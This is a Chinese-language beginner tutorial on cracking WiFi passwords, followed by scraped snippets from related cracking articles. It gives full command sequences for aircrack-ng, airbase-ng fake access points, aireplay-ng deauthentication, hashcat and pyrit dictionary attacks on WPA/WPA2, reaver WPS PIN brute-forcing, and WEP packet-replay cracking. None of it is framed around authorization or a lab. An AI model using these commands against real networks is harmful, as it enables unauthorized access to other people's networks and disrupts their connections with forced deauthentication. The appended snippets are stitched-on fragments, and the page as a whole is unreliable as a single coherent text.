WIFI 破解(初级)

话不多说,先来看看字典破解 wpa2 的效果

===================================

===============================================
字典破解 wifi-wpa/wpa2
目前最常用的加密类型
此方法只适合破解弱口令
其他暴力破解伤CPU/GPU
===============================================
1. 安装aircrack-ng
   1. 直接使用apt-get,但有的软件仓库不是最新版
   2. 源码安装 http://www.aircrack-ng.org/
      * 现在要翻一下才能下载

2. 无线网卡开启monitor(建议另外使用usb无线网卡)
  > sudo ifconfig wlan0 down
  > sudo iwconfig wlan0 mode monitor

3. 查看无线网络,选择对象BSSID和CHN(通道),同时记下ESSID
  > sudo airodump-ng wlan0

4. 对指定对象进行dump, 并记录连接该BSSID的STATION(CLIENTID, 也就是谁连了)
  > sudo airodump-ng -w wpa2 -c CHN --bssid BSSID wlan0
  * -w 为保存的抓包文件的前缀
  * -c 为前面记录的通道

5. 创建fake AP(可以加快获取握手报文)
  > sudo airbase-ng -a BSSID --essid ESSID -c CH -Z 4 -W 1 wlan0
    * 如果是wpa  一般是  -z 2  z小写(TKIP)
    * 如果是wpa2 一般是  -Z 4  Z大写(CCMP)

6. 向该网络内广播解除认证报文
  > sudo aireplay-ng -0 0 -a BSSID -c CLIENTID --ignore-negative-one wlan0

7. 等待handshake
  > 步骤4中右上脚显示收到handshake报文
  > 使用aircrack-ng *.cap 探测是否包含handshake
  > 当包含handshake报文时停止4,5,6

以下使用三种软件破解:
aircrack-ng
------
1. 开始破解
   > aircrack-ng *.cap -w dict
   * dict为字典文件,每一行一个密码

hashcat
-------
1. 将dump文件wpa2-01.cap转换为待破解格式文件done.hccap
   > wpaclean out.cap wpa2-01.cap
   > aircrack-ng out.cap -J done

2. 开始破解
   > hashcat -m 2500 done.hccap dict

pyrit
-------
1. 开始破解
   > pyrit -r wpa2-01.cap -i dict attack_passthrough

===========================================
通过PIN破解wifi
此方法需要wifi开启wps功能,且信号尽量好
目前大部分厂家的无线路由器默认是关闭wps的
同时也具有防PIN的功能
所以现在此方法用得不多了
===========================================

1. 网卡配置参考wpa/wpa2破解

2. 查看开启WPS的无线网络,选择对象BSSID
  > sudo airodump-ng --wps wlan0

3. 开始破解
  > sudo reaver -i wlan0 -b BSSID -vv
  * 根据实际环境可以改变pin的间隔时间

4. 漫长的等待

============================================
WEP加密方式破解
如果有WEP加密的wifi基本都可以很快破解
但是很不幸,这种加密方式已很难见到
但是还是学习下
============================================
1. 网卡配置参考wpa/wpa2破解

2. 查看无线无线网络,找到加密方式为WEP的wifi, 记录对象BSSID
  > sudo airodump-ng wlan0

3. 对指定对象进行dump
  > sudo airodump-ng -w wep -c 10 --bssid BSSID wlan0

4. 向对象发送请求以获取更多的报文
  > sudo aireplay-ng -1 0 -a BSSID wlan0
  * 此步骤可选择攻击方式很多,可以自行man一下

5. 读取网络中的报文(读取上万后即可停止)
  > sudo aireplay-ng -3 -b BSSID wlan0

6. 进行破解,利用当前目录下的.cap文件
  > aircrack-ng wep-01.cap

7. 如果第6步破解失败,则重复5-6

时间: 2024-10-09 05:21:52

WIFI 破解(初级)的相关文章

一些Wifi破解姿势

wlan0:无线网卡设备 BSSID/AP's MAC:目标路由器的mac地址 Client's MAC:连接到此wifi客户端的mac地址 ESSID:这个无线的名字 CH[X] 扫描的信道号,因为airodump是跳频扫描的,会一直扫描13个信道.后面是你的扫描时间和你本地时间. BSSID:路由器MAC地址 PWR:网卡的信号水平,新号越好数值越大,但是例如第一个出现‘-1’说明该客户端不在我的监听范围内. Beacons:就是Beacon数据的速率 #Date:被捕获的数据分组数量 #/

[WIFI]破解工具-BT4+unetbootin+spoonwep/wpa

一.首先下载这三个工具: 1.BT4正式版: 下载地址:http://ftp.heanet.ie/mirrors/backtrack/bt4-pre-final.iso 2.U盘启动制作工具:unetbootin-windows-356 下载地址:http://www.atuonce.cn/blog/attachments/month_0906/t2009621225526.rar 3.spoonwep-wpa破解工具用于BT4下的deb安装包 迅雷下载地址:(已经修正下载地址, 打开迅雷, 然

wifi破解不是真黑客不靠谱?

Wifi破解神器骗局:摆地摊+网络兜售 近日,"万能wifi密码破解器"风靡全国地摊,各地小贩开始兜售这种蹭网卡,声称可破解各种wifi密码,当场测试也是成功的,但是买主回家一个测试就发现魔力失效.此外,网络上也有售卖免费wifi上网接收器.卡皇等,其中也不乏欺诈陷阱. 真相:市民不免气愤,拆开一看神器竟是一个用USB供电的发光二极管,进价不够3.5元,挂上"万能wifi密码破解器"的头衔,竟卖到15.35或50元不等.摊贩的骗局就是,选中的wifi是通过身上携带的

ubuntu下aircrack-ng的wifi破解

首先安装aircrack-ng,apt-get install aircrack-ng. 然后打开shell,输入airmon-ng start wlan0. 输入airodump-ng mon0. 输入airodump-ng  -c 1(频道) -w wep.cap --bssid 74:25:8A:7B:59:C8(目标mac) mon0. 输入ifconfig wlan0 down. 输入aireplay-ng -1 0 -a 74:25:8A:7B:59:C8(目标mac) -h 90:

commview for wifi 破解无线

相信了解无线网络的读者都知道安全性是无线网络的先天不足,正是因为他的传播通过空气,所以信号很容易出现外泄问题,相比有线网络来说信号监听变得非常简单. 部分用户通过WEP加密的方式来保护网络通讯数据包避免被监听者破译,不过WEP加密在现今这个安全技术飞速发展的时代已经不再保险,网上也有很多介绍实 现无线WEP入侵的方法.今天笔者就再介绍一个更为精简的方法,让我们可以在五分钟之内实现无线WEP网络的入侵,将WEP加密密钥轻松还原出明文. 一,五分钟实现无线WEP入侵的特点:   众所周知WEP加密入

[HackWifi]wifi破解详解

每天都能看到有不少网友在回复论坛之前发布的一篇破解WiFi密码的帖子,并伴随各种疑问.今天流云就为大家准备一篇实战型的文章吧,详细图文从思维CDlinux U盘启动到中文设置,如何进行路由SSID扫描.WPA密码类型该如何破解.字典该怎样做(WEP加密的密码貌似可以直接破解不用字典)效果比BT8要强悍很多!这是一篇详细介绍WiFi密码破解的文章,准备好了吗? 好了,先说下提前要准备的东东吧:1.U盘一枚,最小1G空间.需进行格式化操作,提前保存内部文件.2.CDlinux镜像.帖子最后会提供一枚

实战-Fluxion与wifi热点伪造、钓鱼、中间人攻击、wifi破解

原作者:PG     整理:玄魂工作室-荣杰 目录: 0x00-Fluxion是什么 0x01-Fluxion工作原理 0x02-Kali上安装fluxion 0x03-Fluxion工具使用说明+实战破解wifi 小编在作者PG原稿上斗胆修改,”跪求”原作者赐风油精 0x00-Fluxion是什么 Fluxion是一个无线破解工具,这款软件可以帮你挤掉WiFi主人的网络让你自己登陆进去,而且WiFi主人怎么挤也挤不过你.这个工具有点像是Linset的翻版.但是与Linset比较起来,它有着更多

安全系列之wifi破解思路

声明:此文章仅供研究学习和技术交流,请勿用于破解他人 WIFI 密码!违反法律,一切后果自负! 一.准备工作 1. 硬件准备 无线网卡:一般笔记本自带的无线网卡不支持监听模式,所以要使用一个外置的无线网卡,这里推荐购买3070或者8187芯片的外置USB无线网卡,8187L芯片是一种内含集成电路的硅片,是一种大功率无线网卡的首脑部分,常被用做"蹭网卡"芯片.具有体积小,辐射大,使用价值高等特点. 2. 软件准备 操作系统: https://www.kali.org/downloads/

wifi 破解笔记

最近小夜刚刚学习了无线WiFi的密码破解,感觉很神奇,不过以下操作都是作为学习测试的内容进行的,希望志同道合的小伙伴切不要触碰法律的红线哦!       话不多说,直接上硬菜. 实验环境: 硬件需求:    一台笔记本 一部USB WIFI信号发射接收器 软件需求:    kali虚拟机 操作步骤: 一.插上USB WIFI信号发射接收器,打开kali虚拟机,选择添加USB WIFI信号发射接收器 二.打开终端,进行WIFI信号发射接收器启动,具体命令如下: step1: 查看网络网卡信息 #i